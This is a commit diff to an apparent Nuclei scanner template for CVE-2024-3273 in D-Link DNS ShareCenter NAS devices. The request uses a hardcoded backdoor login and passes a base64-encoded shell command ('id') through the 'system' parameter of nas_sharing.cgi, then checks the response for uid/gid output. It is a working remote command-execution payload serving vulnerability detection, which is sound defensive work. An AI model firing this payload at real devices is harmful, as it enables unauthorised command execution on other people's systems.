Update CVE-2024-3273.yaml

patch-1
pussycat0x 2024-04-12 17:39:56 +05:30 committed by GitHub
parent 821ee22396
commit bb6725de3c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 11 additions and 1 deletions

View File

@ -23,16 +23,26 @@ info:
fofa-query: app="D_Link-DNS-ShareCenter"
tags: cve,cve2024,dlink,nas
variables:
cmd: "id"
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=ZWNobyB0ZXN0"
- "{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}"
matchers-condition: and
matchers:
- type: word
words:
- "<auth_state>1</auth_state>"
- "uid="
condition: and
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status: